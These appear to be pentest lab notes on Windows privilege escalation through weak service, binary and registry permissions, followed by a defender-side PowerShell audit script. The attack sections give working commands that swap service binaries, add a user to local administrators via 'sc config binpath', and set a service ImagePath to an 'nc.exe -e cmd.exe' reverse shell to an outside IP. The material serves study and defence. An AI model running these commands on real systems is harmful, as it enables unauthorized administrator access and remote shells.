# Weak Permissions

**Replacing Service Binary**

```
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

sc start SecurityService
```

### Weak Service Permissions

```powershell
SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===

=== Modifiable Services ===

  Name             : WindscribeService
  DisplayName      : WindscribeService
  Description      : Manages the firewall and controls the VPN tunnel
  State            : Running
  StartMode        : Auto
  PathName         : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"
```

**Checking Permissions with AccessChk**

Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service. The flags we use, in order, are -q (omit banner), -u (suppress errors), -v (verbose), -c (specify the name of a Windows service), and -w (show only objects that have write access). If we have **SERVICE\_ALL\_ACCESS** over the service, we have full read/write access to it.

```
accesschk.exe /accepteula -quvcw WindscribeService
```

**Changing the Service Binary Path**

We can use our permissions to change the binary path maliciously. Let's change it to add our user to the local administrator group.

```
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

sc stop WindscribeService
sc start WindscribeService
```

## Permissive Registry ACLs

It is also worth searching for weak service ACLs in the Windows Registry. We can do this using accesschk.

```
accesschk.exe /accepteula "<user>" -kvuqsw hklm\System\CurrentControlSet\services
```

**Changing ImagePath with PowerShell**

We can abuse this using the PowerShell cmdlet Set-ItemProperty to change the ImagePath value, using a command such as:

```powershell
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
```

**Modifiable Registry Autorun Binary**

We can query WMI (here through Get-CimInstance) to see which programs run at system startup. If we have write permission on the registry entry for one of these programs, or can overwrite a binary that is listed, we may be able to escalate privileges to another user the next time that user logs in.

```powershell
Get-CimInstance Win32_StartupCommand | Select-Object Name, Command, Location, User | Format-List
```
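The following is an added defender-side audit, not part of these notes or of SharpUp/AccessChk. It combines the three checks described above (the service object's DACL, the service binary on disk, and the service's key under HKLM\SYSTEM\CurrentControlSet\Services) into one PowerShell sweep and reports only entries where a low-privilege identity holds write-type rights; the SID list and the rights masks are my assumptions, and it is meant to run as an administrator on the host being reviewed.

```powershell
# Added audit example, not part of the original notes. SIDs: Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')
# Service rights that allow changing binPath or taking over the object: SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL
$SvcWriteMask = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x10000000
# File/registry rights that allow replacing the binary or rewriting ImagePath (plus GENERIC_ALL / GENERIC_WRITE bits)
$FsWriteMask  = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, TakeOwnership, ChangePermissions' -bor 0x10000000 -bor 0x40000000
$RegWriteMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, TakeOwnership, ChangePermissions' -bor 0x10000000 -bor 0x40000000
function Get-Sid($Identity) {
    # Get-Acl reports NTAccount names; translate to a SID so a renamed group does not hide a match
    try { $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $Identity.Value }
}
function Find-WeakServicePermissions {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $name = $svc.Name
        # 1. Service object DACL (what accesschk -c inspects): sc.exe sdshow prints the SDDL, .NET parses it
        $sddl = (sc.exe sdshow $name | Where-Object { $_ -match '^D:' }) -join ''
        if ($sddl) {
            $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor $sddl
            foreach ($ace in $sd.DiscretionaryAcl) {
                if ($ace.AceType -eq 'AccessAllowed' -and $LowPrivSids -contains $ace.SecurityIdentifier.Value -and ($ace.AccessMask -band $SvcWriteMask)) {
                    [pscustomobject]@{ Service = $name; Object = 'ServiceDACL'; Target = $name; Identity = $ace.SecurityIdentifier.Value; Rights = ('0x{0:X}' -f $ace.AccessMask) }
                }
            }
        }
        # 2. Binary on disk: strip surrounding quotes and any arguments from PathName (as in the Windscribe entry above)
        if ($svc.PathName -match '^"([^"]+)"|^(\S+)') {
            $exe = if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
            if (Test-Path -LiteralPath $exe) {
                foreach ($ace in (Get-Acl -LiteralPath $exe).Access) {
                    if ($ace.AccessControlType -eq 'Allow' -and $LowPrivSids -contains (Get-Sid $ace.IdentityReference) -and ([int]$ace.FileSystemRights -band $FsWriteMask)) {
                        [pscustomobject]@{ Service = $name; Object = 'Binary'; Target = $exe; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
                    }
                }
            }
        }
        # 3. Registry key holding ImagePath (what the accesschk -k sweep above covers)
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$name"
        if (Test-Path -LiteralPath $key) {
            foreach ($ace in (Get-Acl -LiteralPath $key).Access) {
                if ($ace.AccessControlType -eq 'Allow' -and $LowPrivSids -contains (Get-Sid $ace.IdentityReference) -and ([int]$ace.RegistryRights -band $RegWriteMask)) {
                    [pscustomobject]@{ Service = $name; Object = 'RegistryKey'; Target = $key; Identity = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
                }
            }
        }
    }
}
Find-WeakServicePermissions | Format-Table -AutoSize
```

Any row it prints is a service that should be fixed by tightening the offending ACE (the service DACL, the binary's NTFS ACL, or the registry key) rather than by trusting the default inheritance from its parent.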
